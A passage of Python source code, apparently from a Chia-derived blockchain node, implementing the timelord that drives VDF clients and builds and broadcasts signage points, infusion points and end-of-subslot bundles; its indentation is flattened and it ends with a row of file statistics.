# For each chain, send those info when the process spawns.
self.iters_to_submit: Dict[Chain, List[uint64]] = {}
self.iters_submitted: Dict[Chain, List[uint64]] = {}
self.iters_finished: Set = set()
# For each iteration submitted, know if it's a signage point, an infusion point or an end of slot.
self.iteration_to_proof_type: Dict[uint64, IterationType] = {}
# List of proofs finished.
self.proofs_finished: List[Tuple[Chain, VDFInfo, VDFProof, int]] = []
# Data to send at vdf_client initialization.
self.overflow_blocks: List[timelord_protocol.NewUnfinishedBlockTimelord] = []
# Incremented each time `reset_chains` has been called.
# Used to label proofs in `finished_proofs` and to only filter proofs corresponding to the most recent state.
self.num_resets: int = 0
self.process_communication_tasks: List[asyncio.Task] = []
self.main_loop = None
self.vdf_server = None
self._shut_down = False
self.vdf_failures: List[Tuple[Chain, Optional[int]]] = []
self.vdf_failures_count: int = 0
self.vdf_failure_time: float = 0
self.total_unfinished: int = 0
self.total_infused: int = 0
self.state_changed_callback: Optional[Callable] = None
self.sanitizer_mode = self.config["sanitizer_mode"]
self.pending_bluebox_info: List[timelord_protocol.RequestCompactProofOfTime] = []
self.last_active_time = time.time()
async def _start(self):
self.lock: asyncio.Lock = asyncio.Lock()
self.vdf_server = await asyncio.start_server(
self._handle_client,
self.config["vdf_server"]["host"],
self.config["vdf_server"]["port"],
)
self.last_state: LastState = LastState(self.constants)
if not self.sanitizer_mode:
self.main_loop = asyncio.create_task(self._manage_chains())
else:
self.main_loop = asyncio.create_task(self._manage_discriminant_queue_sanitizer())
log.info("Started timelord.")
def _close(self):
self._shut_down = True
for task in self.process_communication_tasks:
task.cancel()
if self.main_loop is not None:
self.main_loop.cancel()
async def _await_closed(self):
pass
def set_server(self, server: AppleServer):
self.server = server
async def _handle_client(self, reader: asyncio.StreamReader, writer: asyncio.StreamWriter):
async with self.lock:
client_ip = writer.get_extra_info("peername")[0]
log.debug(f"New timelord connection from client: {client_ip}.")
if client_ip in self.ip_whitelist:
self.free_clients.append((client_ip, reader, writer))
log.debug(f"Added new VDF client {client_ip}.")
for ip, end_time in list(self.potential_free_clients):
if ip == client_ip:
self.potential_free_clients.remove((ip, end_time))
break
async def _stop_chain(self, chain: Chain):
try:
while chain not in self.allows_iters:
self.lock.release()
await asyncio.sleep(0.05)
log.error(f"Trying to stop {chain} before its initialization.")
await self.lock.acquire()
if chain not in self.chain_type_to_stream:
log.warning(f"Trying to stop a crashed chain: {chain}.")
return None
stop_ip, _, stop_writer = self.chain_type_to_stream[chain]
self.potential_free_clients.append((stop_ip, time.time()))
stop_writer.write(b"010")
await stop_writer.drain()
if chain in self.allows_iters:
self.allows_iters.remove(chain)
if chain not in self.unspawned_chains:
self.unspawned_chains.append(chain)
if chain in self.chain_type_to_stream:
del self.chain_type_to_stream[chain]
except ConnectionResetError as e:
log.error(f"{e}")
def _can_infuse_unfinished_block(self, block: timelord_protocol.NewUnfinishedBlockTimelord) -> Optional[uint64]:
assert self.last_state is not None
sub_slot_iters = self.last_state.get_sub_slot_iters()
difficulty = self.last_state.get_difficulty()
ip_iters = self.last_state.get_last_ip()
rc_block = block.reward_chain_block
try:
block_sp_iters, block_ip_iters = iters_from_block(
self.constants,
rc_block,
sub_slot_iters,
difficulty,
)
except Exception as e:
log.warning(f"Received invalid unfinished block: {e}.")
return None
block_sp_total_iters = self.last_state.total_iters - ip_iters + block_sp_iters
if is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
block_sp_total_iters -= self.last_state.get_sub_slot_iters()
found_index = -1
for index, (rc, total_iters) in enumerate(self.last_state.reward_challenge_cache):
if rc == block.rc_prev:
found_index = index
break
if found_index == -1:
log.warning(f"Will not infuse {block.rc_prev} because its reward chain challenge is not in the chain")
return None
if ip_iters > block_ip_iters:
log.warning("Too late to infuse block")
return None
new_block_iters = uint64(block_ip_iters - ip_iters)
if len(self.last_state.reward_challenge_cache) > found_index + 1:
if self.last_state.reward_challenge_cache[found_index + 1][1] < block_sp_total_iters:
log.warning(
f"Will not infuse unfinished block {block.rc_prev} sp total iters {block_sp_total_iters}, "
f"because there is another infusion before its SP"
)
return None
if self.last_state.reward_challenge_cache[found_index][1] > block_sp_total_iters:
if not is_overflow_block(self.constants, block.reward_chain_block.signage_point_index):
log.error(
f"Will not infuse unfinished block {block.rc_prev}, sp total iters: {block_sp_total_iters}, "
f"because its iters are too low"
)
return None
if new_block_iters > 0:
return new_block_iters
return None
async def _reset_chains(self, first_run=False, only_eos=False):
# First, stop all chains.
self.last_active_time = time.time()
log.debug("Resetting chains")
ip_iters = self.last_state.get_last_ip()
sub_slot_iters = self.last_state.get_sub_slot_iters()
if not first_run:
for chain in list(self.chain_type_to_stream.keys()):
await self._stop_chain(chain)
# Adjust all signage points iterations to the peak.
iters_per_signage = uint64(sub_slot_iters // self.constants.NUM_SPS_SUB_SLOT)
self.signage_point_iters = [
(k * iters_per_signage - ip_iters, k)
for k in range(1, self.constants.NUM_SPS_SUB_SLOT)
if k * iters_per_signage - ip_iters > 0
]
for sp, k in self.signage_point_iters:
assert k * iters_per_signage > 0
assert k * iters_per_signage < sub_slot_iters
# Adjust all unfinished blocks iterations to the peak.
new_unfinished_blocks = []
self.iters_finished = set()
self.proofs_finished = []
self.num_resets += 1
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
self.iters_to_submit[chain] = []
self.iters_submitted[chain] = []
self.iteration_to_proof_type = {}
if not only_eos:
for block in self.unfinished_blocks + self.overflow_blocks:
new_block_iters: Optional[uint64] = self._can_infuse_unfinished_block(block)
# Does not add duplicates, or blocks that we cannot infuse
if new_block_iters and new_block_iters not in self.iters_to_submit[Chain.CHALLENGE_CHAIN]:
if block not in self.unfinished_blocks:
self.total_unfinished += 1
new_unfinished_blocks.append(block)
for chain in [Chain.REWARD_CHAIN, Chain.CHALLENGE_CHAIN]:
self.iters_to_submit[chain].append(new_block_iters)
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(new_block_iters)
self.iteration_to_proof_type[new_block_iters] = IterationType.INFUSION_POINT
# Remove all unfinished blocks that have already passed.
self.unfinished_blocks = new_unfinished_blocks
# Signage points.
if not only_eos and len(self.signage_point_iters) > 0:
count_signage = 0
for signage, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
self.iters_to_submit[chain].append(signage)
self.iteration_to_proof_type[signage] = IterationType.SIGNAGE_POINT
count_signage += 1
if count_signage == 3:
break
left_subslot_iters = sub_slot_iters - ip_iters
assert left_subslot_iters > 0
if self.last_state.get_deficit() < self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
self.iters_to_submit[Chain.INFUSED_CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.CHALLENGE_CHAIN].append(left_subslot_iters)
self.iters_to_submit[Chain.REWARD_CHAIN].append(left_subslot_iters)
self.iteration_to_proof_type[left_subslot_iters] = IterationType.END_OF_SUBSLOT
for chain, iters in self.iters_to_submit.items():
for iteration in iters:
assert iteration > 0
async def _handle_new_peak(self):
assert self.new_peak is not None
self.last_state.set_state(self.new_peak)
if self.total_unfinished > 0:
remove_unfinished = []
for unf_block_timelord in self.unfinished_blocks + self.overflow_blocks:
if (
unf_block_timelord.reward_chain_block.get_hash()
== self.new_peak.reward_chain_block.get_unfinished().get_hash()
):
if unf_block_timelord not in self.unfinished_blocks:
# We never got the EOS for this, but we have the block in overflow list
self.total_unfinished += 1
remove_unfinished.append(unf_block_timelord)
if len(remove_unfinished) > 0:
self.total_infused += 1
for block in remove_unfinished:
if block in self.unfinished_blocks:
self.unfinished_blocks.remove(block)
if block in self.overflow_blocks:
self.overflow_blocks.remove(block)
infusion_rate = round(self.total_infused / self.total_unfinished * 100.0, 2)
log.info(
f"Total unfinished blocks: {self.total_unfinished}. "
f"Total infused blocks: {self.total_infused}. "
f"Infusion rate: {infusion_rate}%."
)
self.new_peak = None
await self._reset_chains()
async def _handle_subslot_end(self):
self.last_state.set_state(self.new_subslot_end)
for block in self.unfinished_blocks:
if self._can_infuse_unfinished_block(block) is not None:
self.total_unfinished += 1
self.new_subslot_end = None
await self._reset_chains()
async def _map_chains_with_vdf_clients(self):
while not self._shut_down:
picked_chain = None
async with self.lock:
if len(self.free_clients) == 0:
break
ip, reader, writer = self.free_clients[0]
for chain_type in self.unspawned_chains:
challenge = self.last_state.get_challenge(chain_type)
initial_form = self.last_state.get_initial_form(chain_type)
if challenge is not None and initial_form is not None:
picked_chain = chain_type
break
if picked_chain is None:
break
picked_chain = self.unspawned_chains[0]
self.chain_type_to_stream[picked_chain] = (ip, reader, writer)
self.free_clients = self.free_clients[1:]
self.unspawned_chains = self.unspawned_chains[1:]
self.chain_start_time[picked_chain] = time.time()
log.debug(f"Mapping free vdf_client with chain: {picked_chain}.")
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
picked_chain, challenge, initial_form, ip, reader, writer, proof_label=self.num_resets
)
)
)
async def _submit_iterations(self):
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN, Chain.INFUSED_CHALLENGE_CHAIN]:
if chain in self.allows_iters:
_, _, writer = self.chain_type_to_stream[chain]
for iteration in self.iters_to_submit[chain]:
if iteration in self.iters_submitted[chain]:
continue
log.debug(f"Submitting iterations to {chain}: {iteration}")
assert iteration > 0
prefix = str(len(str(iteration)))
if len(str(iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(iteration)
writer.write(iter_str.encode())
await writer.drain()
self.iters_submitted[chain].append(iteration)
def _clear_proof_list(self, iters: uint64):
return [
(chain, info, proof, label)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations != iters
]
async def _check_for_new_sp(self, iter_to_look_for: uint64):
signage_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.SIGNAGE_POINT
]
if len(signage_iters) == 0:
return None
to_remove = []
for potential_sp_iters, signage_point_index in self.signage_point_iters:
if potential_sp_iters not in signage_iters or potential_sp_iters != iter_to_look_for:
continue
signage_iter = potential_sp_iters
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == signage_iter and label == self.num_resets
]
# Wait for both cc and rc to have the signage point.
if len(proofs_with_iter) == 2:
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient signage point data {signage_iter}")
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"SP: Do not have correct challenge {rc_challenge.hex()}" f" has {rc_info.challenge}")
# This proof is on an outdated challenge, so don't use it
continue
iters_from_sub_slot_start = cc_info.number_of_iterations + self.last_state.get_last_ip()
response = timelord_protocol.NewSignagePointVDF(
signage_point_index,
dataclasses.replace(cc_info, number_of_iterations=iters_from_sub_slot_start),
cc_proof,
rc_info,
rc_proof,
)
if self.server is not None:
msg = make_msg(ProtocolMessageTypes.new_signage_point_vdf, response)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
# Cleanup the signage point from memory.
to_remove.append((signage_iter, signage_point_index))
self.proofs_finished = self._clear_proof_list(signage_iter)
# Send the next 3 signage point to the chains.
next_iters_count = 0
for next_sp, k in self.signage_point_iters:
for chain in [Chain.CHALLENGE_CHAIN, Chain.REWARD_CHAIN]:
if next_sp not in self.iters_submitted[chain] and next_sp not in self.iters_to_submit[chain]:
self.iters_to_submit[chain].append(next_sp)
self.iteration_to_proof_type[next_sp] = IterationType.SIGNAGE_POINT
next_iters_count += 1
if next_iters_count == 3:
break
# Break so we alternate between checking SP and IP
break
for r in to_remove:
self.signage_point_iters.remove(r)
async def _check_for_new_ip(self, iter_to_look_for: uint64):
if len(self.unfinished_blocks) == 0:
return None
infusion_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.INFUSION_POINT
]
for iteration in infusion_iters:
if iteration != iter_to_look_for:
continue
proofs_with_iter = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == iteration and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(proofs_with_iter) == chain_count:
block = None
ip_iters = None
for unfinished_block in self.unfinished_blocks:
try:
_, ip_iters = iters_from_block(
self.constants,
unfinished_block.reward_chain_block,
self.last_state.get_sub_slot_iters(),
self.last_state.get_difficulty(),
)
except Exception as e:
log.error(f"Error {e}")
continue
if ip_iters - self.last_state.get_last_ip() == iteration:
block = unfinished_block
break
assert ip_iters is not None
if block is not None:
ip_total_iters = self.last_state.get_total_iters() + iteration
challenge = block.reward_chain_block.get_hash()
icc_info: Optional[VDFInfo] = None
icc_proof: Optional[VDFProof] = None
cc_info: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_info: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in proofs_with_iter:
if chain == Chain.CHALLENGE_CHAIN:
cc_info = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_info = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_info = info
icc_proof = proof
if cc_info is None or cc_proof is None or rc_info is None or rc_proof is None:
log.error(f"Insufficient VDF proofs for infusion point ch: {challenge} iterations:{iteration}")
return None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_info.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(
f"Do not have correct challenge {rc_challenge.hex()} "
f"has {rc_info.challenge}, partial hash {block.reward_chain_block.get_hash()}"
)
# This proof is on an outdated challenge, so don't use it
continue
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
log.debug(f"Generated infusion point for challenge: {challenge} iterations: {iteration}.")
overflow = is_overflow_block(self.constants, block.reward_chain_block.signage_point_index)
if not self.last_state.can_infuse_block(overflow):
log.warning("Too many blocks, or overflow in new epoch, cannot infuse, discarding")
return None
cc_info = dataclasses.replace(cc_info, number_of_iterations=ip_iters)
response = timelord_protocol.NewInfusionPointVDF(
challenge,
cc_info,
cc_proof,
rc_info,
rc_proof,
icc_info,
icc_proof,
)
msg = make_msg(ProtocolMessageTypes.new_infusion_point_vdf, response)
if self.server is not None:
await self.server.send_to_all([msg], NodeType.FULL_NODE)
self.proofs_finished = self._clear_proof_list(iteration)
if (
self.last_state.get_last_block_total_iters() is None
and not self.last_state.state_type == StateType.FIRST_SUB_SLOT
):
# We don't know when the last block was, so we can't make peaks
return None
sp_total_iters = (
ip_total_iters
- ip_iters
+ calculate_sp_iters(
self.constants,
block.sub_slot_iters,
block.reward_chain_block.signage_point_index,
)
- (block.sub_slot_iters if overflow else 0)
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
is_transaction_block = True
height: uint32 = uint32(0)
else:
last_block_ti = self.last_state.get_last_block_total_iters()
assert last_block_ti is not None
is_transaction_block = last_block_ti < sp_total_iters
height = uint32(self.last_state.get_height() + 1)
if height < 5:
# Don't directly update our state for the first few blocks, because we cannot validate
# whether the pre-farm is correct
return None
new_reward_chain_block = RewardChainBlock(
uint128(self.last_state.get_weight() + block.difficulty),
height,
uint128(ip_total_iters),
block.reward_chain_block.signage_point_index,
block.reward_chain_block.pos_ss_cc_challenge_hash,
block.reward_chain_block.proof_of_space,
block.reward_chain_block.challenge_chain_sp_vdf,
block.reward_chain_block.challenge_chain_sp_signature,
cc_info,
block.reward_chain_block.reward_chain_sp_vdf,
block.reward_chain_block.reward_chain_sp_signature,
rc_info,
icc_info,
is_transaction_block,
)
if self.last_state.state_type == StateType.FIRST_SUB_SLOT:
# Genesis
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
elif overflow and self.last_state.deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK:
if self.last_state.peak is not None:
assert self.last_state.subslot_end is None
# This means the previous block is also an overflow block, and did not manage
# to lower the deficit, therefore we cannot lower it either. (new slot)
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
# This means we are the first infusion in this sub-slot. This may be a new slot or not.
assert self.last_state.subslot_end is not None
if self.last_state.subslot_end.infused_challenge_chain is None:
# There is no ICC, which means we are not finishing a slot. We can reduce the deficit.
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1
else:
# There is an ICC, which means we are finishing a slot. Different slot, so can't change
# the deficit
new_deficit = self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
else:
new_deficit = max(self.last_state.deficit - 1, 0)
if new_deficit == self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK - 1:
last_csb_or_eos = ip_total_iters
else:
last_csb_or_eos = self.last_state.last_challenge_sb_or_eos_total_iters
if self.last_state.just_infused_sub_epoch_summary():
new_sub_epoch_summary = None
passed_ses_height_but_not_yet_included = False
else:
new_sub_epoch_summary = block.sub_epoch_summary
if new_reward_chain_block.height % self.constants.SUB_EPOCH_BLOCKS == 0:
passed_ses_height_but_not_yet_included = True
else:
passed_ses_height_but_not_yet_included = (
self.last_state.get_passed_ses_height_but_not_yet_included()
)
self.new_peak = timelord_protocol.NewPeakTimelord(
new_reward_chain_block,
block.difficulty,
uint8(new_deficit),
block.sub_slot_iters,
new_sub_epoch_summary,
self.last_state.reward_challenge_cache,
uint128(last_csb_or_eos),
passed_ses_height_but_not_yet_included,
)
await self._handle_new_peak()
# Break so we alternate between checking SP and IP
break
async def _check_for_end_of_subslot(self, iter_to_look_for: uint64):
left_subslot_iters = [
iteration for iteration, t in self.iteration_to_proof_type.items() if t == IterationType.END_OF_SUBSLOT
]
if len(left_subslot_iters) == 0:
return None
if left_subslot_iters[0] != iter_to_look_for:
return None
chains_finished = [
(chain, info, proof)
for chain, info, proof, label in self.proofs_finished
if info.number_of_iterations == left_subslot_iters[0] and label == self.num_resets
]
if self.last_state.get_challenge(Chain.INFUSED_CHALLENGE_CHAIN) is not None:
chain_count = 3
else:
chain_count = 2
if len(chains_finished) == chain_count:
icc_ip_vdf: Optional[VDFInfo] = None
icc_ip_proof: Optional[VDFProof] = None
cc_vdf: Optional[VDFInfo] = None
cc_proof: Optional[VDFProof] = None
rc_vdf: Optional[VDFInfo] = None
rc_proof: Optional[VDFProof] = None
for chain, info, proof in chains_finished:
if chain == Chain.CHALLENGE_CHAIN:
cc_vdf = info
cc_proof = proof
if chain == Chain.REWARD_CHAIN:
rc_vdf = info
rc_proof = proof
if chain == Chain.INFUSED_CHALLENGE_CHAIN:
icc_ip_vdf = info
icc_ip_proof = proof
assert cc_proof is not None and rc_proof is not None and cc_vdf is not None and rc_vdf is not None
rc_challenge = self.last_state.get_challenge(Chain.REWARD_CHAIN)
if rc_vdf.challenge != rc_challenge:
assert rc_challenge is not None
log.warning(f"Do not have correct challenge {rc_challenge.hex()} has" f" {rc_vdf.challenge}")
# This proof is on an outdated challenge, so don't use it
return None
log.debug("Collected end of subslot vdfs.")
self.iters_finished.add(iter_to_look_for)
self.last_active_time = time.time()
iters_from_sub_slot_start = cc_vdf.number_of_iterations + self.last_state.get_last_ip()
cc_vdf = dataclasses.replace(cc_vdf, number_of_iterations=iters_from_sub_slot_start)
if icc_ip_vdf is not None:
if self.last_state.peak is not None:
total_iters = (
self.last_state.get_total_iters()
- self.last_state.get_last_ip()
+ self.last_state.get_sub_slot_iters()
)
else:
total_iters = self.last_state.get_total_iters() + self.last_state.get_sub_slot_iters()
iters_from_cb = uint64(total_iters - self.last_state.last_challenge_sb_or_eos_total_iters)
if iters_from_cb > self.last_state.sub_slot_iters:
log.error(f"{self.last_state.peak}")
log.error(f"{self.last_state.subslot_end}")
assert False
assert iters_from_cb <= self.last_state.sub_slot_iters
icc_ip_vdf = dataclasses.replace(icc_ip_vdf, number_of_iterations=iters_from_cb)
icc_sub_slot: Optional[InfusedChallengeChainSubSlot] = (
None if icc_ip_vdf is None else InfusedChallengeChainSubSlot(icc_ip_vdf)
)
if self.last_state.get_deficit() == 0:
assert icc_sub_slot is not None
icc_sub_slot_hash = icc_sub_slot.get_hash()
else:
icc_sub_slot_hash = None
next_ses: Optional[SubEpochSummary] = self.last_state.get_next_sub_epoch_summary()
if next_ses is not None:
log.info(f"Including sub epoch summary{next_ses}")
ses_hash = next_ses.get_hash()
new_sub_slot_iters = next_ses.new_sub_slot_iters
new_difficulty = next_ses.new_difficulty
else:
ses_hash = None
new_sub_slot_iters = None
new_difficulty = None
cc_sub_slot = ChallengeChainSubSlot(cc_vdf, icc_sub_slot_hash, ses_hash, new_sub_slot_iters, new_difficulty)
eos_deficit: uint8 = (
self.last_state.get_deficit()
if self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK > self.last_state.get_deficit() > 0
else self.constants.MIN_BLOCKS_PER_CHALLENGE_BLOCK
)
rc_sub_slot = RewardChainSubSlot(
rc_vdf,
cc_sub_slot.get_hash(),
icc_sub_slot.get_hash() if icc_sub_slot is not None else None,
eos_deficit,
)
eos_bundle = EndOfSubSlotBundle(
cc_sub_slot,
icc_sub_slot,
rc_sub_slot,
SubSlotProofs(cc_proof, icc_ip_proof, rc_proof),
)
if self.server is not None:
msg = make_msg(
ProtocolMessageTypes.new_end_of_sub_slot_vdf,
timelord_protocol.NewEndOfSubSlotVDF(eos_bundle),
)
await self.server.send_to_all([msg], NodeType.FULL_NODE)
log.info(
f"Built end of subslot bundle. cc hash: {eos_bundle.challenge_chain.get_hash()}. New_difficulty: "
f"{eos_bundle.challenge_chain.new_difficulty} New ssi: {eos_bundle.challenge_chain.new_sub_slot_iters}"
)
if next_ses is None or next_ses.new_difficulty is None:
self.unfinished_blocks = self.overflow_blocks.copy()
else:
# No overflow blocks in a new epoch
self.unfinished_blocks = []
self.overflow_blocks = []
self.new_subslot_end = eos_bundle
await self._handle_subslot_end()
async def _handle_failures(self):
if len(self.vdf_failures) > 0:
# This can happen if one of the VDF processes has an issue. In this case, we abort all other
# infusion points and signage points, and go straight to the end of slot, so we avoid potential
# issues with the number of iterations that failed.
failed_chain, proof_label = self.vdf_failures[0]
log.error(
f"Vdf clients failed {self.vdf_failures_count} times. Last failure: {failed_chain}, "
f"label {proof_label}, current: {self.num_resets}"
)
if proof_label == self.num_resets:
await self._reset_chains(only_eos=True)
self.vdf_failure_time = time.time()
self.vdf_failures = []
# If something goes wrong in the VDF client due to a failed thread, we might get stuck in a situation where we
# are waiting for that client to finish. Usually other peers will finish the VDFs and reset us. In the case that
# there are no other timelords, this reset should bring the timelord back to a running state.
if time.time() - self.vdf_failure_time < self.constants.SUB_SLOT_TIME_TARGET * 3:
# If we have recently had a failure, allow some more time to finish the slot (we can be up to 3x slower)
active_time_threshold = self.constants.SUB_SLOT_TIME_TARGET * 3
else:
# If there were no failures recently trigger a reset after 60 seconds of no activity.
# Signage points should be every 9 seconds
active_time_threshold = 60
if time.time() - self.last_active_time > active_time_threshold:
log.error(f"Not active for {active_time_threshold} seconds, restarting all chains")
await self._reset_chains()
async def _manage_chains(self):
async with self.lock:
await asyncio.sleep(5)
await self._reset_chains(True)
while not self._shut_down:
try:
await asyncio.sleep(0.1)
async with self.lock:
await self._handle_failures()
# We've got a new peak, process it.
if self.new_peak is not None:
await self._handle_new_peak()
# Map free vdf_clients to unspawned chains.
await self._map_chains_with_vdf_clients()
async with self.lock:
# Submit pending iterations.
await self._submit_iterations()
not_finished_iters = [
it for it in self.iters_submitted[Chain.REWARD_CHAIN] if it not in self.iters_finished
]
if len(not_finished_iters) == 0:
await asyncio.sleep(0.1)
continue
selected_iter = min(not_finished_iters)
# Check for new infusion point and broadcast it if present.
await self._check_for_new_ip(selected_iter)
# Check for new signage point and broadcast it if present.
await self._check_for_new_sp(selected_iter)
# Check for end of subslot, respawn chains and build EndOfSubslotBundle.
await self._check_for_end_of_subslot(selected_iter)
except Exception:
tb = traceback.format_exc()
log.error(f"Error while handling message: {tb}")
async def _do_process_communication(
self,
chain: Chain,
challenge: bytes32,
initial_form: ClassgroupElement,
ip: str,
reader: asyncio.StreamReader,
writer: asyncio.StreamWriter,
# Data specific only when running in bluebox mode.
bluebox_iteration: Optional[uint64] = None,
header_hash: Optional[bytes32] = None,
height: Optional[uint32] = None,
field_vdf: Optional[uint8] = None,
# Labels a proof to the current state only
proof_label: Optional[int] = None,
):
disc: int = create_discriminant(challenge, self.constants.DISCRIMINANT_SIZE_BITS)
try:
# Depending on the flags 'fast_algorithm' and 'sanitizer_mode',
# the timelord tells the vdf_client what to execute.
async with self.lock:
if self.sanitizer_mode:
writer.write(b"S")
else:
if self.config["fast_algorithm"]:
# Run n-wesolowski (fast) algorithm.
writer.write(b"N")
else:
# Run two-wesolowski (slow) algorithm.
writer.write(b"T")
await writer.drain()
prefix = str(len(str(disc)))
if len(prefix) == 1:
prefix = "00" + prefix
if len(prefix) == 2:
prefix = "0" + prefix
async with self.lock:
writer.write((prefix + str(disc)).encode())
await writer.drain()
# Send initial_form prefixed with its length.
async with self.lock:
writer.write(bytes([len(initial_form.data)]) + initial_form.data)
await writer.drain()
try:
ok = await reader.readexactly(2)
except (asyncio.IncompleteReadError, ConnectionResetError, Exception) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
return None
if ok.decode() != "OK":
return None
log.debug("Got handshake with VDF client.")
if not self.sanitizer_mode:
async with self.lock:
self.allows_iters.append(chain)
else:
async with self.lock:
assert chain is Chain.BLUEBOX
assert bluebox_iteration is not None
prefix = str(len(str(bluebox_iteration)))
if len(str(bluebox_iteration)) < 10:
prefix = "0" + prefix
iter_str = prefix + str(bluebox_iteration)
writer.write(iter_str.encode())
await writer.drain()
# Listen to the client until "STOP" is received.
while True:
try:
data = await reader.readexactly(4)
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
msg = ""
try:
msg = data.decode()
except Exception:
pass
if msg == "STOP":
log.debug(f"Stopped client running on ip {ip}.")
async with self.lock:
writer.write(b"ACK")
await writer.drain()
break
else:
try:
# This must be a proof, 4 bytes is length prefix
length = int.from_bytes(data, "big")
proof = await reader.readexactly(length)
stdout_bytes_io: io.BytesIO = io.BytesIO(bytes.fromhex(proof.decode()))
except (
asyncio.IncompleteReadError,
ConnectionResetError,
Exception,
) as e:
log.warning(f"{type(e)} {e}")
async with self.lock:
self.vdf_failures.append((chain, proof_label))
self.vdf_failures_count += 1
break
iterations_needed = uint64(int.from_bytes(stdout_bytes_io.read(8), "big", signed=True))
y_size_bytes = stdout_bytes_io.read(8)
y_size = uint64(int.from_bytes(y_size_bytes, "big", signed=True))
y_bytes = stdout_bytes_io.read(y_size)
witness_type = uint8(int.from_bytes(stdout_bytes_io.read(1), "big", signed=True))
proof_bytes: bytes = stdout_bytes_io.read()
# Verifies our own proof just in case
form_size = ClassgroupElement.get_size(self.constants)
output = ClassgroupElement.from_bytes(y_bytes[:form_size])
if not self.sanitizer_mode:
time_taken = time.time() - self.chain_start_time[chain]
ips = int(iterations_needed / time_taken * 10) / 10
log.info(
f"Finished PoT chall:{challenge[:10].hex()}.. {iterations_needed}"
f" iters, "
f"Estimated IPS: {ips}, Chain: {chain}"
)
vdf_info: VDFInfo = VDFInfo(
challenge,
iterations_needed,
output,
)
vdf_proof: VDFProof = VDFProof(
witness_type,
proof_bytes,
self.sanitizer_mode,
)
if not vdf_proof.is_valid(self.constants, initial_form, vdf_info):
log.error("Invalid proof of time!")
if not self.sanitizer_mode:
async with self.lock:
assert proof_label is not None
self.proofs_finished.append((chain, vdf_info, vdf_proof, proof_label))
else:
async with self.lock:
writer.write(b"010")
await writer.drain()
assert header_hash is not None
assert field_vdf is not None
assert height is not None
response = timelord_protocol.RespondCompactProofOfTime(
vdf_info, vdf_proof, header_hash, height, field_vdf
)
if self.server is not None:
message = make_msg(ProtocolMessageTypes.respond_compact_proof_of_time, response)
await self.server.send_to_all([message], NodeType.FULL_NODE)
except ConnectionResetError as e:
log.debug(f"Connection reset with VDF client {e}")
async def _manage_discriminant_queue_sanitizer(self):
while not self._shut_down:
async with self.lock:
try:
while len(self.pending_bluebox_info) > 0 and len(self.free_clients) > 0:
# Select randomly the field_vdf we're creating a compact vdf for.
# This is done because CC_SP and CC_IP are more frequent than
# CC_EOS and ICC_EOS. This guarantees everything is picked uniformly.
target_field_vdf = random.randint(1, 4)
info = next(
(info for info in self.pending_bluebox_info if info.field_vdf == target_field_vdf),
None,
)
if info is None:
# Nothing found with target_field_vdf, just pick the first VDFInfo.
info = self.pending_bluebox_info[0]
ip, reader, writer = self.free_clients[0]
self.process_communication_tasks.append(
asyncio.create_task(
self._do_process_communication(
Chain.BLUEBOX,
info.new_proof_of_time.challenge,
ClassgroupElement.get_default_element(),
ip,
reader,
writer,
info.new_proof_of_time.number_of_iterations,
info.header_hash,
info.height,
info.field_vdf,
)
)
)
self.pending_bluebox_info.remove(info)
self.free_clients = self.free_clients[1:]
except Exception as e:
log.error(f"Exception manage discriminant queue: {e}")
await asyncio.sleep(0.1)
| 49.366795 | 120 | 0.562432 |
